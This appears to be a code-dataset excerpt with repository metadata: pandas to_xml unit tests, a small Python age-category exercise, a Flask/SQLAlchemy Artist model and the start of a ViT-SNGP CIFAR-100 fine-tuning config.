filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, index=False, parser=parser)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == expected
def test_index_false_rename_row_root(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<books>
<book>
<category>cooking</category>
<title>Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.0</price>
</book>
<book>
<category>children</category>
<title>Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</book>
<book>
<category>web</category>
<title>Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</book>
</books>"""
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(
path, index=False, root_name="books", row_name="book", parser=parser
)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == expected
# NA_REP
na_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
def test_na_elem_output(datapath, parser):
output = geom_df.to_xml(parser=parser)
output = equalize_decl(output)
assert output == na_expected
def test_na_empty_str_elem_option(datapath, parser):
output = geom_df.to_xml(na_rep="", parser=parser)
output = equalize_decl(output)
assert output == na_expected
def test_na_empty_elem_option(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides>0.0</sides>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(na_rep="0.0", parser=parser)
output = equalize_decl(output)
assert output == expected
# ATTR_COLS
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_attrs_cols_nan_output(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row index="0" shape="square" degrees="360" sides="4.0"/>
<row index="1" shape="circle" degrees="360"/>
<row index="2" shape="triangle" degrees="180" sides="3.0"/>
</data>"""
output = geom_df.to_xml(attr_cols=["shape", "degrees", "sides"], parser=parser)
output = equalize_decl(output)
assert output == expected
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_attrs_cols_prefix(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<doc:data xmlns:doc="http://example.xom">
<doc:row doc:index="0" doc:shape="square" \
doc:degrees="360" doc:sides="4.0"/>
<doc:row doc:index="1" doc:shape="circle" \
doc:degrees="360"/>
<doc:row doc:index="2" doc:shape="triangle" \
doc:degrees="180" doc:sides="3.0"/>
</doc:data>"""
output = geom_df.to_xml(
attr_cols=["index", "shape", "degrees", "sides"],
namespaces={"doc": "http://example.xom"},
prefix="doc",
parser=parser,
)
output = equalize_decl(output)
assert output == expected
def test_attrs_unknown_column(parser):
with pytest.raises(KeyError, match=("no valid column")):
geom_df.to_xml(attr_cols=["shape", "degreees", "sides"], parser=parser)
def test_attrs_wrong_type(parser):
with pytest.raises(TypeError, match=("is not a valid type for attr_cols")):
geom_df.to_xml(attr_cols='"shape", "degreees", "sides"', parser=parser)
# ELEM_COLS
def test_elems_cols_nan_output(datapath, parser):
elems_cols_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<degrees>360</degrees>
<sides>4.0</sides>
<shape>square</shape>
</row>
<row>
<degrees>360</degrees>
<sides/>
<shape>circle</shape>
</row>
<row>
<degrees>180</degrees>
<sides>3.0</sides>
<shape>triangle</shape>
</row>
</data>"""
output = geom_df.to_xml(
index=False, elem_cols=["degrees", "sides", "shape"], parser=parser
)
output = equalize_decl(output)
assert output == elems_cols_expected
def test_elems_unknown_column(parser):
with pytest.raises(KeyError, match=("no valid column")):
geom_df.to_xml(elem_cols=["shape", "degreees", "sides"], parser=parser)
def test_elems_wrong_type(parser):
with pytest.raises(TypeError, match=("is not a valid type for elem_cols")):
geom_df.to_xml(elem_cols='"shape", "degreees", "sides"', parser=parser)
def test_elems_and_attrs_cols(datapath, parser):
elems_cols_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row shape="square">
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row shape="circle">
<degrees>360</degrees>
<sides/>
</row>
<row shape="triangle">
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(
index=False,
elem_cols=["degrees", "sides"],
attr_cols=["shape"],
parser=parser,
)
output = equalize_decl(output)
assert output == elems_cols_expected
# HIERARCHICAL COLUMNS
def test_hierarchical_columns(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<location>inner</location>
<type>terrestrial</type>
<count_mass>4</count_mass>
<sum_mass>11.81</sum_mass>
<mean_mass>2.95</mean_mass>
</row>
<row>
<location>outer</location>
<type>gas giant</type>
<count_mass>2</count_mass>
<sum_mass>2466.5</sum_mass>
<mean_mass>1233.25</mean_mass>
</row>
<row>
<location>outer</location>
<type>ice giant</type>
<count_mass>2</count_mass>
<sum_mass>189.23</sum_mass>
<mean_mass>94.61</mean_mass>
</row>
<row>
<location>All</location>
<type/>
<count_mass>8</count_mass>
<sum_mass>2667.54</sum_mass>
<mean_mass>333.44</mean_mass>
</row>
</data>"""
pvt = planet_df.pivot_table(
index=["location", "type"],
values="mass",
aggfunc=["count", "sum", "mean"],
margins=True,
).round(2)
output = pvt.to_xml(parser=parser)
output = equalize_decl(output)
assert output == expected
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_hierarchical_attrs_columns(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row location="inner" type="terrestrial" count_mass="4" \
sum_mass="11.81" mean_mass="2.95"/>
<row location="outer" type="gas giant" count_mass="2" \
sum_mass="2466.5" mean_mass="1233.25"/>
<row location="outer" type="ice giant" count_mass="2" \
sum_mass="189.23" mean_mass="94.61"/>
<row location="All" type="" count_mass="8" \
sum_mass="2667.54" mean_mass="333.44"/>
</data>"""
pvt = planet_df.pivot_table(
index=["location", "type"],
values="mass",
aggfunc=["count", "sum", "mean"],
margins=True,
).round(2)
output = pvt.to_xml(attr_cols=list(pvt.reset_index().columns.values), parser=parser)
output = equalize_decl(output)
assert output == expected
# MULTIINDEX
def test_multi_index(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<location>inner</location>
<type>terrestrial</type>
<count>4</count>
<sum>11.81</sum>
<mean>2.95</mean>
</row>
<row>
<location>outer</location>
<type>gas giant</type>
<count>2</count>
<sum>2466.5</sum>
<mean>1233.25</mean>
</row>
<row>
<location>outer</location>
<type>ice giant</type>
<count>2</count>
<sum>189.23</sum>
<mean>94.61</mean>
</row>
</data>"""
agg = (
planet_df.groupby(["location", "type"])["mass"]
.agg(["count", "sum", "mean"])
.round(2)
)
output = agg.to_xml(parser=parser)
output = equalize_decl(output)
assert output == expected
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_multi_index_attrs_cols(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row location="inner" type="terrestrial" count="4" \
sum="11.81" mean="2.95"/>
<row location="outer" type="gas giant" count="2" \
sum="2466.5" mean="1233.25"/>
<row location="outer" type="ice giant" count="2" \
sum="189.23" mean="94.61"/>
</data>"""
agg = (
planet_df.groupby(["location", "type"])["mass"]
.agg(["count", "sum", "mean"])
.round(2)
)
output = agg.to_xml(attr_cols=list(agg.reset_index().columns.values), parser=parser)
output = equalize_decl(output)
assert output == expected
# NAMESPACE
def test_default_namespace(parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data xmlns="http://example.com">
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(namespaces={"": "http://example.com"}, parser=parser)
output = equalize_decl(output)
assert output == expected
# PREFIX
def test_namespace_prefix(parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<doc:data xmlns:doc="http://example.com">
<doc:row>
<doc:index>0</doc:index>
<doc:shape>square</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides>4.0</doc:sides>
</doc:row>
<doc:row>
<doc:index>1</doc:index>
<doc:shape>circle</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides/>
</doc:row>
<doc:row>
<doc:index>2</doc:index>
<doc:shape>triangle</doc:shape>
<doc:degrees>180</doc:degrees>
<doc:sides>3.0</doc:sides>
</doc:row>
</doc:data>"""
output = geom_df.to_xml(
namespaces={"doc": "http://example.com"}, prefix="doc", parser=parser
)
output = equalize_decl(output)
assert output == expected
def test_missing_prefix_in_nmsp(parser):
with pytest.raises(KeyError, match=("doc is not included in namespaces")):
geom_df.to_xml(
namespaces={"": "http://example.com"}, prefix="doc", parser=parser
)
def test_namespace_prefix_and_default(parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<doc:data xmlns="http://example.com" xmlns:doc="http://other.org">
<doc:row>
<doc:index>0</doc:index>
<doc:shape>square</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides>4.0</doc:sides>
</doc:row>
<doc:row>
<doc:index>1</doc:index>
<doc:shape>circle</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides/>
</doc:row>
<doc:row>
<doc:index>2</doc:index>
<doc:shape>triangle</doc:shape>
<doc:degrees>180</doc:degrees>
<doc:sides>3.0</doc:sides>
</doc:row>
</doc:data>"""
output = geom_df.to_xml(
namespaces={"": "http://example.com", "doc": "http://other.org"},
prefix="doc",
parser=parser,
)
output = equalize_decl(output)
if output is not None:
# etree and lxml differs on order of namespace prefixes
output = output.replace(
'xmlns:doc="http://other.org" xmlns="http://example.com"',
'xmlns="http://example.com" xmlns:doc="http://other.org"',
)
assert output == expected
# ENCODING
encoding_expected = """\
<?xml version='1.0' encoding='ISO-8859-1'?>
<data>
<row>
<index>0</index>
<rank>1</rank>
<malename>José</malename>
<femalename>Sofía</femalename>
</row>
<row>
<index>1</index>
<rank>2</rank>
<malename>Luis</malename>
<femalename>Valentina</femalename>
</row>
<row>
<index>2</index>
<rank>3</rank>
<malename>Carlos</malename>
<femalename>Isabella</femalename>
</row>
<row>
<index>3</index>
<rank>4</rank>
<malename>Juan</malename>
<femalename>Camila</femalename>
</row>
<row>
<index>4</index>
<rank>5</rank>
<malename>Jorge</malename>
<femalename>Valeria</femalename>
</row>
</data>"""
def test_encoding_option_str(datapath, parser):
filename = datapath("io", "data", "xml", "baby_names.xml")
df_file = read_xml(filename, parser=parser, encoding="ISO-8859-1").head(5)
output = df_file.to_xml(encoding="ISO-8859-1", parser=parser)
if output is not None:
# etree and lxml differ on quotes and case in xml declaration
output = output.replace(
'<?xml version="1.0" encoding="ISO-8859-1"?',
"<?xml version='1.0' encoding='ISO-8859-1'?",
)
assert output == encoding_expected
@td.skip_if_no("lxml")
def test_correct_encoding_file(datapath):
filename = datapath("io", "data", "xml", "baby_names.xml")
df_file = read_xml(filename, encoding="ISO-8859-1", parser="lxml")
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, index=False, encoding="ISO-8859-1", parser="lxml")
@td.skip_if_no("lxml")
@pytest.mark.parametrize("encoding", ["UTF-8", "UTF-16", "ISO-8859-1"])
def test_wrong_encoding_option_lxml(datapath, parser, encoding):
filename = datapath("io", "data", "xml", "baby_names.xml")
df_file = read_xml(filename, encoding="ISO-8859-1", parser="lxml")
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, index=False, encoding=encoding, parser=parser)
def test_misspelled_encoding(parser):
with pytest.raises(LookupError, match=("unknown encoding")):
geom_df.to_xml(encoding="uft-8", parser=parser)
# PRETTY PRINT
@td.skip_if_no("lxml")
def test_xml_declaration_pretty_print():
expected = """\
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(xml_declaration=False)
assert output == expected
def test_no_pretty_print_with_decl(parser):
expected = (
"<?xml version='1.0' encoding='utf-8'?>\n"
"<data><row><index>0</index><shape>square</shape>"
"<degrees>360</degrees><sides>4.0</sides></row><row>"
"<index>1</index><shape>circle</shape><degrees>360"
"</degrees><sides/></row><row><index>2</index><shape>"
"triangle</shape><degrees>180</degrees><sides>3.0</sides>"
"</row></data>"
)
output = geom_df.to_xml(pretty_print=False, parser=parser)
output = equalize_decl(output)
# etree adds space for closed tags
if output is not None:
output = output.replace(" />", "/>")
assert output == expected
def test_no_pretty_print_no_decl(parser):
expected = (
"<data><row><index>0</index><shape>square</shape>"
"<degrees>360</degrees><sides>4.0</sides></row><row>"
"<index>1</index><shape>circle</shape><degrees>360"
"</degrees><sides/></row><row><index>2</index><shape>"
"triangle</shape><degrees>180</degrees><sides>3.0</sides>"
"</row></data>"
)
output = geom_df.to_xml(xml_declaration=False, pretty_print=False, parser=parser)
# etree adds space for closed tags
if output is not None:
output = output.replace(" />", "/>")
assert output == expected
# PARSER
@td.skip_if_installed("lxml")
def test_default_parser_no_lxml():
with pytest.raises(
ImportError, match=("lxml not found, please install or use the etree parser.")
):
geom_df.to_xml()
def test_unknown_parser():
with pytest.raises(
ValueError, match=("Values for parser can only be lxml or etree.")
):
geom_df.to_xml(parser="bs4")
# STYLESHEET
xsl_expected = """\
<?xml version="1.0" encoding="utf-8"?>
<data>
<row>
<field field="index">0</field>
<field field="shape">square</field>
<field field="degrees">360</field>
<field field="sides">4.0</field>
</row>
<row>
<field field="index">1</field>
<field field="shape">circle</field>
<field field="degrees">360</field>
<field field="sides"/>
</row>
<row>
<field field="index">2</field>
<field field="shape">triangle</field>
<field field="degrees">180</field>
<field field="sides">3.0</field>
</row>
</data>"""
@td.skip_if_no("lxml")
def test_stylesheet_file_like(datapath, mode):
xsl = datapath("io", "data", "xml", "row_field_output.xsl")
with open(xsl, mode) as f:
assert geom_df.to_xml(stylesheet=f) == xsl_expected
@td.skip_if_no("lxml")
def test_stylesheet_io(datapath, mode):
xsl_path = datapath("io", "data", "xml", "row_field_output.xsl")
xsl_obj: Union[BytesIO, StringIO]
with open(xsl_path, mode) as f:
if mode == "rb":
xsl_obj = BytesIO(f.read())
else:
xsl_obj = StringIO(f.read())
output = geom_df.to_xml(stylesheet=xsl_obj)
assert output == xsl_expected
@td.skip_if_no("lxml")
def test_stylesheet_buffered_reader(datapath, mode):
xsl = datapath("io", "data", "xml", "row_field_output.xsl")
with open(xsl, mode) as f:
xsl_obj = f.read()
output = geom_df.to_xml(stylesheet=xsl_obj)
assert output == xsl_expected
@td.skip_if_no("lxml")
def test_stylesheet_wrong_path(datapath):
from lxml.etree import XMLSyntaxError
xsl = os.path.join("data", "xml", "row_field_output.xslt")
with pytest.raises(
XMLSyntaxError,
match=("Start tag expected, '<' not found"),
):
geom_df.to_xml(stylesheet=xsl)
@td.skip_if_no("lxml")
@pytest.mark.parametrize("val", ["", b""])
def test_empty_string_stylesheet(val):
from lxml.etree import XMLSyntaxError
with pytest.raises(
XMLSyntaxError, match=("Document is empty|Start tag expected, '<' not found")
):
geom_df.to_xml(stylesheet=val)
@td.skip_if_no("lxml")
def test_incorrect_xsl_syntax():
from lxml.etree import XMLSyntaxError
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" >
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>
<xsl:template match="row/*">
<field>
<xsl:attribute name="field">
<xsl:value-of select="name()"/>
</xsl:attribute>
<xsl:value-of select="text()"/>
</field>
</xsl:template>
</xsl:stylesheet>"""
with pytest.raises(XMLSyntaxError, match=("Opening and ending tag mismatch")):
geom_df.to_xml(stylesheet=xsl)
@td.skip_if_no("lxml")
def test_incorrect_xsl_eval():
from lxml.etree import XSLTParseError
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node(*)">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>
<xsl:template match="row/*">
<field>
<xsl:attribute name="field">
<xsl:value-of select="name()"/>
</xsl:attribute>
<xsl:value-of select="text()"/>
</field>
</xsl:template>
</xsl:stylesheet>"""
with pytest.raises(XSLTParseError, match=("failed to compile")):
geom_df.to_xml(stylesheet=xsl)
@td.skip_if_no("lxml")
def test_incorrect_xsl_apply(parser):
from lxml.etree import XSLTApplyError
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:copy-of select="document('non_existent.xml')/*"/>
</xsl:copy>
</xsl:template>
</xsl:stylesheet>"""
with pytest.raises(XSLTApplyError, match=("Cannot resolve URI")):
with tm.ensure_clean("test.xml") as path:
geom_df.to_xml(path, stylesheet=xsl)
def test_stylesheet_with_etree(datapath):
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node(*)">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>"""
with pytest.raises(
ValueError, match=("To use stylesheet, you need lxml installed")
):
geom_df.to_xml(parser="etree", stylesheet=xsl)
@td.skip_if_no("lxml")
def test_style_to_csv():
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:param name="delim">,</xsl:param>
<xsl:template match="/data">
<xsl:text>,shape,degrees,sides
</xsl:text>
<xsl:apply-templates select="row"/>
</xsl:template>
<xsl:template match="row">
<xsl:value-of select="concat(index, $delim, shape, $delim,
degrees, $delim, sides)"/>
<xsl:text>
</xsl:text>
</xsl:template>
</xsl:stylesheet>"""
out_csv = geom_df.to_csv(line_terminator="\n")
if out_csv is not None:
out_csv = out_csv.strip()
out_xml = geom_df.to_xml(stylesheet=xsl)
assert out_csv == out_xml
@td.skip_if_no("lxml")
def test_style_to_string():
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:param name="delim"><xsl:text> </xsl:text></xsl:param>
<xsl:template match="/data">
<xsl:text> shape degrees sides
</xsl:text>
<xsl:apply-templates select="row"/>
</xsl:template>
<xsl:template match="row">
<xsl:value-of select="concat(index, ' ',
substring($delim, 1, string-length('triangle')
- string-length(shape) + 1),
shape,
substring($delim, 1, string-length(name(degrees))
- string-length(degrees) + 2),
degrees,
substring($delim, 1, string-length(name(sides))
- string-length(sides) + 2),
sides)"/>
<xsl:text>
</xsl:text>
</xsl:template>
</xsl:stylesheet>"""
out_str = geom_df.to_string()
out_xml = geom_df.to_xml(na_rep="NaN", stylesheet=xsl)
assert out_xml == out_str
@td.skip_if_no("lxml")
def test_style_to_json():
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:param name="quot">"</xsl:param>
<xsl:template match="/data">
<xsl:text>{"shape":{</xsl:text>
<xsl:apply-templates select="descendant::row/shape"/>
<xsl:text>},"degrees":{</xsl:text>
<xsl:apply-templates select="descendant::row/degrees"/>
<xsl:text>},"sides":{</xsl:text>
<xsl:apply-templates select="descendant::row/sides"/>
<xsl:text>}}</xsl:text>
</xsl:template>
<xsl:template match="shape|degrees|sides">
<xsl:variable name="val">
<xsl:if test = ".=''">
<xsl:value-of select="'null'"/>
</xsl:if>
<xsl:if test = "number(text()) = text()">
<xsl:value-of select="text()"/>
</xsl:if>
<xsl:if test = "number(text()) != text()">
<xsl:value-of select="concat($quot, text(), $quot)"/>
</xsl:if>
</xsl:variable>
<xsl:value-of select="concat($quot, preceding-sibling::index,
$quot,':', $val)"/>
<xsl:if test="preceding-sibling::index != //row[last()]/index">
<xsl:text>,</xsl:text>
</xsl:if>
</xsl:template>
</xsl:stylesheet>"""
out_json = geom_df.to_json()
out_xml = geom_df.to_xml(stylesheet=xsl)
assert out_json == out_xml
# COMPRESSION
geom_xml = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
@pytest.mark.parametrize("comp", ["bz2", "gzip", "xz", "zip"])
def test_compression_output(parser, comp):
with tm.ensure_clean() as path:
geom_df.to_xml(path, parser=parser, compression=comp)
with get_handle(
path,
"r",
compression=comp,
) as handle_obj:
output = handle_obj.handle.read()
output = equalize_decl(output)
assert geom_xml == output.strip()
@pytest.mark.parametrize("comp", ["bz2", "gzip", "xz", "zip"])
@pytest.mark.parametrize("compfile", ["xml.bz2", "xml.gz", "xml.xz", "xml.zip"])
def test_filename_and_suffix_comp(parser, comp, compfile):
with tm.ensure_clean(filename=compfile) as path:
geom_df.to_xml(path, parser=parser, compression=comp)
with get_handle(
path,
"r",
compression=comp,
) as handle_obj:
output = handle_obj.handle.read()
output = equalize_decl(output)
assert geom_xml == output.strip()
def test_unsuported_compression(datapath, parser):
with pytest.raises(ValueError, match="Unrecognized compression type"):
with tm.ensure_clean() as path:
geom_df.to_xml(path, parser=parser, compression="7z")
# STORAGE OPTIONS
@tm.network
@td.skip_if_no("s3fs")
@td.skip_if_no("lxml")
def test_s3_permission_output(parser):
import s3fs
with pytest.raises(PermissionError, match="Access Denied"):
fs = s3fs.S3FileSystem(anon=True)
fs.ls("pandas-test")
geom_df.to_xml("s3://pandas-test/geom.xml", compression="zip", parser=parser)
| 25.828725
| 88
| 0.601832
|
8311647048cfbeb58c4691a1cfe57b5bf517df7e
| 383
|
py
|
Python
|
pythonteste/desafio41.py
|
dangiotto/Python
|
29a9d18d7595a5c21e65dafc39f7fd4c55d8971c
|
[
"MIT"
] | 1
|
2020-10-17T03:23:59.000Z
|
2020-10-17T03:23:59.000Z
|
pythonteste/desafio41.py
|
dangiotto/Python
|
29a9d18d7595a5c21e65dafc39f7fd4c55d8971c
|
[
"MIT"
] | null | null | null |
pythonteste/desafio41.py
|
dangiotto/Python
|
29a9d18d7595a5c21e65dafc39f7fd4c55d8971c
|
[
"MIT"
] | null | null | null |
i = int(input('Informe sua idade : '))
if i<=9:
print('Idade {} - Até 9 anos : MIRIM'.format(i))
elif i>9 and i<=14:
print('Idade {} - Até 14 anos: INFANTIL'.format(i))
elif i>14 and i<=19:
print('Idade {} - Até 19 anos : JUNIOR'.format(i))
elif i>19 and i<=20:
print('Idade {} - Até 20 anos : SêNIOR'.format(i))
else:
print('Idade {} - Acima : MASTER'.format(i))
| 34.818182
| 55
| 0.590078
|
7f3a717a56ec983c93fd4d190a83beaf7a2c5029
| 3,845
|
py
|
Python
|
models/artist.py
|
wanderindev/fyyur
|
acf3a44ce7fae6b24576a320afd447c0595d76e5
|
[
"MIT"
] | null | null | null |
models/artist.py
|
wanderindev/fyyur
|
acf3a44ce7fae6b24576a320afd447c0595d76e5
|
[
"MIT"
] | null | null | null |
models/artist.py
|
wanderindev/fyyur
|
acf3a44ce7fae6b24576a320afd447c0595d76e5
|
[
"MIT"
] | 2
|
2020-07-16T22:02:13.000Z
|
2020-11-22T21:16:28.000Z
|
from datetime import datetime
from sqlalchemy import desc, exc
from app import db
from constants import GENRE_CHECK
from .mixin import ModelMixin
from .show import Show
class Artist(db.Model, ModelMixin):
__tablename__ = "artists"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, nullable=False)
city = db.Column(db.String(120), nullable=False)
state = db.Column(db.String(120), nullable=False)
phone = db.Column(db.String(120))
genres = db.Column(db.ARRAY(db.String(30)), nullable=False)
image_link = db.Column(db.String(500))
facebook_link = db.Column(db.String(120))
website = db.Column(db.String(500))
seeking_venue = db.Column(db.Boolean, default=True)
seeking_description = db.Column(db.String(500))
date_created = db.Column(
db.DateTime, nullable=False, default=datetime.utcnow
)
shows = db.relationship(
"Show", backref="artist", lazy=True, cascade="delete"
)
def __init__(self, **kwargs):
super(Artist, self).__init__(**kwargs)
check_genres = all(genre in GENRE_CHECK for genre in self.genres)
if not check_genres:
raise exc.ProgrammingError(
"Invalid genre",
{"Genres passed": self.genres},
{"Genres allowed": GENRE_CHECK},
)
@classmethod
def past_shows(cls, _id):
return Show.past_shows_by_artist(_id)
@classmethod
def past_shows_count(cls, _id):
return len(cls.past_shows(_id))
@classmethod
def upcoming_shows(cls, _id):
return Show.upcoming_shows_by_artist(_id)
@classmethod
def upcoming_shows_count(cls, _id):
return len(cls.upcoming_shows(_id))
@classmethod
def get_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
@classmethod
def get_artists(cls):
return [
{"id": artist.id, "name": artist.name,}
for artist in cls.query.all()
]
@classmethod
def search(cls, search_term):
artists = cls.query.filter(cls.name.ilike(f"%{search_term}%")).all()
return {
"data": [
{
"id": artist.id,
"name": artist.name,
"num_upcoming_shows": cls.upcoming_shows_count(artist.id),
}
for artist in artists
],
"count": len(artists),
}
@classmethod
def get_artist(cls, _id):
_obj = {
"past_shows": cls.past_shows(_id),
"past_shows_count": cls.past_shows_count(_id),
"upcoming_shows": cls.upcoming_shows(_id),
"upcoming_shows_count": cls.upcoming_shows_count(_id),
}
artist = cls.get_by_id(_id)
if not artist:
return None
return cls.to_dict(artist, _obj)
@classmethod
def update(cls, _id, data):
artist = cls.get_by_id(_id)
artist.name = data.get("name", "")
artist.city = data.get("city", "")
artist.state = data.get("state", "")
artist.phone = data.get("phone", "")
artist.genres = data.get("genres", [])
artist.image_link = data.get("image_link", "")
artist.facebook_link = data.get("facebook_link", "")
artist.website = data.get("website", "")
artist.seeking_venue = data.get("seeking_venue", False)
artist.seeking_description = data.get("seeking_description", "")
return artist.save_to_db()
@classmethod
def get_recent(cls):
artists = cls.query.order_by(desc(cls.date_created)).limit(10).all()
return [{"id": artist.id, "name": artist.name,} for artist in artists]
| 33.434783
| 79
| 0.583355
|
1dccaaf07d65ae0b66c9f791eb1d6d2ce5d8cbd0
| 4,132
|
py
|
Python
|
baselines/jft/experiments/jft300m_vit_base16_sngp_finetune_cifar100.py
|
sorennelson/uncertainty-baselines
|
2d8102d1df6f413e85becb0d37b468acbf8730e7
|
[
"Apache-2.0"
] | 794
|
2020-07-17T06:23:58.000Z
|
2022-03-31T08:31:53.000Z
|
baselines/jft/experiments/jft300m_vit_base16_sngp_finetune_cifar100.py
|
piotr-teterwak/uncertainty-baselines
|
8eba807c5224279c582b9d6b86035e6f8a3783a9
|
[
"Apache-2.0"
] | 136
|
2020-08-04T22:42:04.000Z
|
2022-03-26T21:07:03.000Z
|
baselines/jft/experiments/jft300m_vit_base16_sngp_finetune_cifar100.py
|
piotr-teterwak/uncertainty-baselines
|
8eba807c5224279c582b9d6b86035e6f8a3783a9
|
[
"Apache-2.0"
] | 129
|
2020-08-16T12:46:55.000Z
|
2022-03-31T23:00:10.000Z
|
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=line-too-long
r"""ViT-SNGP-B/16 finetuning on CIFAR.
"""
# pylint: enable=line-too-long
import ml_collections
def get_config():
"""Config for training a patch-transformer on JFT."""
config = ml_collections.ConfigDict()
# Fine-tuning dataset
config.dataset = 'cifar100'
config.val_split = 'train[98%:]'
config.train_split = 'train[:98%]'
config.num_classes = 100
# OOD evaluation dataset
config.ood_datasets = ['cifar10', 'svhn_cropped']
config.ood_split = 'test'
config.ood_methods = ['msp', 'maha', 'rmaha']
BATCH_SIZE = 512 # pylint: disable=invalid-name
config.batch_size = BATCH_SIZE
config.total_steps = 10_000
INPUT_RES = 384 # pylint: disable=invalid-name
pp_common = '|value_range(-1, 1)'
